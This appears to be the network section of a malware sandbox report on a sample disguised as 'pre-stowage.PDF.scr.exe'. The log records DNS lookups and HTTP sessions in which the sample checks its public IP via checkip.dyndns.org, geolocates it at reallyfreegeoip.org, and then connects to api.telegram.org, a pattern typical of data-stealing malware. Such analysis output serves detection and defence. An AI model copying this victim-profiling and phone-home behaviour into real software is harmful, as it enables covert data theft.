                                                                                                      Dec 17, 2024 08:34:06.834176064 CET4972480192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:06.953874111 CET8049724193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:07.940956116 CET8049724193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:07.942394018 CET49727443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:07.942430019 CET44349727172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:07.942789078 CET49727443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:07.943073988 CET49727443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:07.943088055 CET44349727172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:07.990890026 CET4972480192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:09.162898064 CET44349727172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:09.209688902 CET49727443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:09.236218929 CET49727443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:09.236243010 CET44349727172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:09.608807087 CET44349727172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:09.608886957 CET44349727172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:09.609008074 CET49727443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:09.614089012 CET49727443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:09.698112011 CET4972480192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:09.699074030 CET4972880192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:09.818373919 CET8049724193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:09.818466902 CET4972480192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:09.818766117 CET8049728193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:09.818861961 CET4972880192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:09.819014072 CET4972880192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:09.939224005 CET8049728193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:10.930502892 CET8049728193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:10.932024956 CET49729443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:10.932061911 CET44349729172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:10.932296038 CET49729443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:10.932542086 CET49729443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:10.932555914 CET44349729172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:10.975300074 CET4972880192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:12.142385960 CET44349729172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:12.189851046 CET49729443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:12.189892054 CET44349729172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:12.587234020 CET44349729172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:12.587291956 CET44349729172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:12.587359905 CET49729443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:12.587971926 CET49729443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:12.592638969 CET4972880192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:12.601248980 CET4973080192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:12.712620974 CET8049728193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:12.712697983 CET4972880192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:12.720993996 CET8049730193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:12.721087933 CET4973080192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:12.721280098 CET4973080192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:12.840940952 CET8049730193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:14.484555960 CET8049730193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:14.486093044 CET49731443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:14.486161947 CET44349731172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:14.486260891 CET49731443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:14.486566067 CET49731443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:14.486603022 CET44349731172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:14.537786007 CET4973080192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:15.723970890 CET44349731172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:15.731899977 CET49731443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:15.731930971 CET44349731172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:16.211242914 CET44349731172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:16.211321115 CET44349731172.67.177.134192.168.2.7
                                                                                                      Dec 17, 2024 08:34:16.211410999 CET49731443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:16.212304115 CET49731443192.168.2.7172.67.177.134
                                                                                                      Dec 17, 2024 08:34:16.227505922 CET4973080192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:16.449120998 CET8049730193.122.130.0192.168.2.7
                                                                                                      Dec 17, 2024 08:34:16.449238062 CET4973080192.168.2.7193.122.130.0
                                                                                                      Dec 17, 2024 08:34:16.451575041 CET49732443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:16.451603889 CET44349732149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:16.451683998 CET49732443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:16.452210903 CET49732443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:16.452235937 CET44349732149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:16.696333885 CET44349732149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:16.714663982 CET49733443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:16.714709044 CET44349733149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:16.714966059 CET49733443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:16.715095043 CET49733443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:16.715122938 CET44349733149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:18.097436905 CET44349733149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:18.097507000 CET49733443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:18.153104067 CET49733443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:18.153122902 CET44349733149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:18.153523922 CET44349733149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:18.155261040 CET49733443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:18.199323893 CET44349733149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:18.608243942 CET44349733149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:18.608341932 CET44349733149.154.167.220192.168.2.7
                                                                                                      Dec 17, 2024 08:34:18.608396053 CET49733443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:18.611958027 CET49733443192.168.2.7149.154.167.220
                                                                                                      Dec 17, 2024 08:34:23.859396935 CET4971580192.168.2.7193.122.130.0
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Dec 17, 2024 08:33:48.504843950 CET5181153192.168.2.71.1.1.1
                                                                                                      Dec 17, 2024 08:33:48.642072916 CET53518111.1.1.1192.168.2.7
                                                                                                      Dec 17, 2024 08:33:50.825853109 CET6025853192.168.2.71.1.1.1
                                                                                                      Dec 17, 2024 08:33:50.967335939 CET53602581.1.1.1192.168.2.7
                                                                                                      Dec 17, 2024 08:34:16.228213072 CET6487853192.168.2.71.1.1.1
                                                                                                      Dec 17, 2024 08:34:16.450675964 CET53648781.1.1.1192.168.2.7
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Dec 17, 2024 08:33:48.504843950 CET192.168.2.71.1.1.10x9a85Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)false
                                                                                                      Dec 17, 2024 08:33:50.825853109 CET192.168.2.71.1.1.10x155fStandard query (0)reallyfreegeoip.orgA (IP address)IN (0x0001)false
                                                                                                      Dec 17, 2024 08:34:16.228213072 CET192.168.2.71.1.1.10xf0a0Standard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Dec 17, 2024 08:33:48.642072916 CET1.1.1.1192.168.2.70x9a85No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Dec 17, 2024 08:33:48.642072916 CET1.1.1.1192.168.2.70x9a85No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)false
                                                                                                      Dec 17, 2024 08:33:48.642072916 CET1.1.1.1192.168.2.70x9a85No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)false
                                                                                                      Dec 17, 2024 08:33:48.642072916 CET1.1.1.1192.168.2.70x9a85No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)false
                                                                                                      Dec 17, 2024 08:33:48.642072916 CET1.1.1.1192.168.2.70x9a85No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)false
                                                                                                      Dec 17, 2024 08:33:48.642072916 CET1.1.1.1192.168.2.70x9a85No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)false
                                                                                                      Dec 17, 2024 08:33:50.967335939 CET1.1.1.1192.168.2.70x155fNo error (0)reallyfreegeoip.org172.67.177.134A (IP address)IN (0x0001)false
                                                                                                      Dec 17, 2024 08:33:50.967335939 CET1.1.1.1192.168.2.70x155fNo error (0)reallyfreegeoip.org104.21.67.152A (IP address)IN (0x0001)false
                                                                                                      Dec 17, 2024 08:34:16.450675964 CET1.1.1.1192.168.2.70xf0a0No error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                      • reallyfreegeoip.org
                                                                                                      • api.telegram.org
                                                                                                      • checkip.dyndns.org
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.749702193.122.130.0806896C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 17, 2024 08:33:48.776305914 CET151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Dec 17, 2024 08:33:49.875155926 CET321INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:33:49 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 104
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 0d9e0d51bdd34faf5fbeb6403edae87e
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                      Dec 17, 2024 08:33:49.911330938 CET127OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Dec 17, 2024 08:33:50.231628895 CET321INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:33:50 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 104
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 12db5aa233b5c3825b27de1f05058ff7
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
                                                                                                      Dec 17, 2024 08:33:52.677329063 CET127OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Dec 17, 2024 08:33:53.016958952 CET321INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:33:52 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 104
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: b83a04db60dcf62945f993731fc67da8
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.749713193.122.130.0806896C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 17, 2024 08:33:54.806826115 CET127OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Dec 17, 2024 08:33:55.926506996 CET321INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:33:55 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 104
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: cf20e80660a19831c28a6ada27d56c02
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.749715193.122.130.0806896C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 17, 2024 08:33:57.709274054 CET127OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Dec 17, 2024 08:33:58.806240082 CET321INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:33:58 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 104
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 943b6d5abeb7b0e3bac14784676b4285
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.749717193.122.130.0806896C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 17, 2024 08:34:00.599440098 CET151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Dec 17, 2024 08:34:01.695772886 CET321INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:34:01 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 104
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: a4ecc9a7ee72da32783e2eb5eb5b8641
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.749721193.122.130.0806896C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 17, 2024 08:34:03.544388056 CET151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Dec 17, 2024 08:34:04.640063047 CET321INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:34:04 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 104
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 14164a9bdef25867a74bab2a46e0c4d6
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      5192.168.2.749724193.122.130.0806896C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 17, 2024 08:34:06.834176064 CET151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Dec 17, 2024 08:34:07.940956116 CET321INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:34:07 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 104
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: ee135d544361108300fd408619cf403f
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      6192.168.2.749728193.122.130.0806896C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 17, 2024 08:34:09.819014072 CET151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Dec 17, 2024 08:34:10.930502892 CET321INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:34:10 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 104
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 7c9b0e162b7fd42f6a6ed7fbedd2b026
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      7192.168.2.749730193.122.130.0806896C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Dec 17, 2024 08:34:12.721280098 CET151OUTGET / HTTP/1.1
                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                      Host: checkip.dyndns.org
                                                                                                      Connection: Keep-Alive
                                                                                                      Dec 17, 2024 08:34:14.484555960 CET321INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:34:14 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 104
                                                                                                      Connection: keep-alive
                                                                                                      Cache-Control: no-cache
                                                                                                      Pragma: no-cache
                                                                                                      X-Request-ID: 13171041f93da1874c10c3ec39cabcc3
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.749703172.67.177.1344436896C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-17 07:33:52 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      Connection: Keep-Alive
                                                                                                      2024-12-17 07:33:52 UTC874INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:33:52 GMT
                                                                                                      Content-Type: text/xml
                                                                                                      Content-Length: 362
                                                                                                      Connection: close
                                                                                                      Cache-Control: max-age=31536000
                                                                                                      CF-Cache-Status: HIT
                                                                                                      Age: 409601
                                                                                                      Last-Modified: Thu, 12 Dec 2024 13:47:11 GMT
                                                                                                      Accept-Ranges: bytes
                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iYCr01qAqUqRZn2NOkkHeTy0SfOrD5Aml7BoNdGwgl6w5jh89j8pbl4rmM4OOU%2B7VswXvdAYSOsxcSbQ5qfpONFYMQ5qcX2pJXXf7pa63wTU5Iaj7qC%2F7gXY4DrIK6iIazrVMp0p"}],"group":"cf-nel","max_age":604800}
                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                      Server: cloudflare
                                                                                                      CF-RAY: 8f353a3b18a88cc0-EWR
                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2049&min_rtt=2048&rtt_var=770&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1420233&cwnd=219&unsent_bytes=0&cid=14452bba45d7b752&ts=478&x=0"
                                                                                                      2024-12-17 07:33:52 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                      Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.749706172.67.177.1344436896C:\Users\user\Desktop\pre-stowage.PDF.scr.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-12-17 07:33:54 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                      Host: reallyfreegeoip.org
                                                                                                      2024-12-17 07:33:54 UTC886INHTTP/1.1 200 OK
                                                                                                      Date: Tue, 17 Dec 2024 07:33:54 GMT
                                                                                                      Content-Type: text/xml
